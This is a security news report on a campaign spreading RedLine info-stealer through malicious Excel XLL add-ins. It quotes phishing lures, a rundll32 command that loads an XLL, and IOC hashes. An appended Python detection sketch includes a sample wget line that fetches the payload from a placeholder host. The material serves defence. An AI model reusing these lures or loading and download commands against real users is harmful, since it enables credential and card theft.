Malicious Excel XLL add-ins push RedLine password-stealing malware

Cybercriminals are spamming website contact forms and discussion forums to distribute Excel XLL files that download and install the RedLine password and information-stealing malware.

RedLine is an information-stealing Trojan that steals cookies, user names and passwords, and credit cards stored in web browsers, as well as FTP credentials and files from an infected device.

In addition to stealing data, RedLine can execute commands, download and run further malware, and create screenshots of the active Windows screen.

All of this data is collected and sent back to the attackers to be sold on criminal marketplaces or used for other malicious and fraudulent activity.

Spamming contact forms and discussion forums

Over the past two weeks, BleepingComputer's contact forms have been spammed numerous times with different phishing lures, including fake advertising requests, holiday gift guides, and website promotions.

After researching the lures, BleepingComputer has found this to be a widespread campaign targeting many websites that use public forums or article comment systems.

In some phishing lures seen by BleepingComputer, the threat actors have created fake websites to host the malicious Excel XLL files used to install the malware.

For example, one campaign used the following spam message and a fake website that imitated the legitimate Plutio site.

Everything you need to run your business. Manage projects, create dazzling proposals and get paid faster. Black Friday! All plans are FREE, no credit card required.

Fake Plutio website developed to push malicious XLL files
Source: BleepingComputer

Other spam messages pretend to be payment reports, requests for advertising, or gift guides with links to malicious XLL files hosted on Google Drive, as shown below.

Malicious XLL file hosted on Google Drive
Source: BleepingComputer

Of particular interest is a lure targeting site owners with requests to advertise on their site and asking them to review the terms of the offer. This leads to a malicious ‘terms.xll’ file that installs the malware.

Sell us advertising space on your site from $ 500
You can read our terms at the link below
https://drive.google[.]com/file/d/xxx/view?usp=sharing

Other lures seen by BleepingComputer this week are:

Thanks for using our app. Your payment has been approved. You can see your payment report at the link below https://xxx[.]link/report.xll

Google just revealed the 100 hottest items of 2021

I won $10.000. Want it too? Read and accept the terms
https://drive.google[.]com/file/d/xxx/view?usp=sharing

Abusing Excel XLL files

These spam campaigns are designed to push malicious Excel XLL files that download and install the RedLine malware on victims' Windows devices.

An XLL file is an add-in that allows developers to extend the functionality of Excel by reading and writing data, importing data from other sources, or creating custom functions to perform various tasks.

XLL files are simply DLL files that export an ‘xlAutoOpen’ function, which Microsoft Excel executes when the add-in is opened.

Opening malicious add-in in Excel
Source: BleepingComputer

While tests conducted by BleepingComputer and security researcher TheAnalyst, with whom we discussed the attack, are not correctly loading the XLL file, they may work in other versions of Microsoft Excel.

However, manually executing the DLL with the regsvr32.exe command or the ‘rundll32 name.xll, xlAutoOpen’ command will extract the wget.exe program to the %UserProfile% folder and use it to download the RedLine binary from a remote site.

XLL DLL downloading the RedLine malware using wget
Source: BleepingComputer

This malicious binary is saved as %UserProfile%\JavaBridge32.exe [VirusTotal] and then executed.

A Registry autorun entry will also be created to automatically launch the RedLine information-stealer every time victims log into Windows.

RedLine autorun added to the Windows Registry
Source: BleepingComputer
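As an added illustration (not code from the article or from any of the parties it names), the following Python sketch turns the three behaviours described above into detection rules and runs them over constructed process and registry events: rundll32/regsvr32 being handed an .xll or the xlAutoOpen export, an executable launched straight from the user profile root (where wget.exe and JavaBridge32.exe are dropped), and a Run-key entry pointing at such an executable. The "type|field=value" event layout, the user name and the download URL are assumptions made for the example.

```python
import re
# Constructed sample telemetry (not from the article), one event per line in a
# simplified "type|field=value|..." layout loosely modelled on Sysmon fields.
SAMPLE_EVENTS = """\
process|image=C:\\Windows\\System32\\rundll32.exe|cmdline=rundll32 terms.xll,xlAutoOpen|parent=explorer.exe
process|image=C:\\Users\\alice\\wget.exe|cmdline=wget.exe http://example.invalid/JavaBridge32.exe|parent=rundll32.exe
process|image=C:\\Users\\alice\\JavaBridge32.exe|cmdline=JavaBridge32.exe|parent=rundll32.exe
registry|key=HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run|value=JavaBridge32|data=C:\\Users\\alice\\JavaBridge32.exe
process|image=C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE|cmdline=EXCEL.EXE budget.xlsx|parent=explorer.exe
"""
LOADERS = ("rundll32.exe", "regsvr32.exe", "excel.exe")
# An executable sitting directly in a user's profile root, e.g. C:\Users\<name>\x.exe
PROFILE_ROOT_EXE = re.compile(r"^[A-Za-z]:\\Users\\[^\\]+\\[^\\]+\.exe$", re.IGNORECASE)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?$", re.IGNORECASE)

def parse_event(line):
    kind, *fields = line.split("|")  # values never contain '|' in this layout
    event = {"type": kind}
    for field in fields:
        key, _, value = field.partition("=")
        event[key] = value
    return event

def check_event(event, line_no):
    findings = []  # (rule, line_no, detail) tuples
    if event["type"] == "process":
        image = event.get("image", "")
        exe = image.rsplit("\\", 1)[-1].lower()
        cmd = event.get("cmdline", "").lower()
        parent = event.get("parent", "").lower()
        # Rule 1: rundll32/regsvr32 handed an .xll path or the xlAutoOpen export.
        if exe in LOADERS[:2] and (".xll" in cmd or "xlautoopen" in cmd):
            findings.append(("xll_manual_load", line_no, cmd))
        # Rule 2: an exe run straight from the profile root by Excel or a DLL loader.
        if PROFILE_ROOT_EXE.match(image) and parent in LOADERS:
            findings.append(("profile_root_exe", line_no, image))
    elif event["type"] == "registry":
        data = event.get("data", "")
        # Rule 3: a Run-key persistence entry pointing at a profile-root executable.
        if RUN_KEY.search(event.get("key", "")) and PROFILE_ROOT_EXE.match(data):
            findings.append(("run_key_persistence", line_no, data))
    return findings

def scan(text):
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        if line.strip():
            findings.extend(check_event(parse_event(line), line_no))
    return findings
```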

Once the malware is executed, it will search for valuable data to steal, including credentials and credit cards saved in the Chrome, Edge, Firefox, Brave, and Opera browsers.

If you have become a victim of this campaign, you should assume that your saved passwords are compromised and immediately change them. Furthermore, if you have credit cards saved in your browsers, you should contact your credit card company to alert them of the incident.

As XLL files are executables, threat actors can use them to perform a variety of malicious behavior on a device. Therefore, it is essential to never open one unless it comes from a trusted source.

These files are not typically sent as attachments but are instead installed through another program or by your Windows admin.

Therefore, if you receive an email or other message distributing these types of files, simply delete the message and report it as spam.

IOCs

XLL files:

terms.xll, report.xll, terms_of_use.xll
f6c06615e35798274dfa9c4b28aaa6d94220804e766e9a70c4f0dab4779ee1db

RedLine:

JavaBridge32.exe: 626db53138176b8a371878ebaa2dbbd724be9a74f9f82ef9ebb7b7bfc0c6b2e9
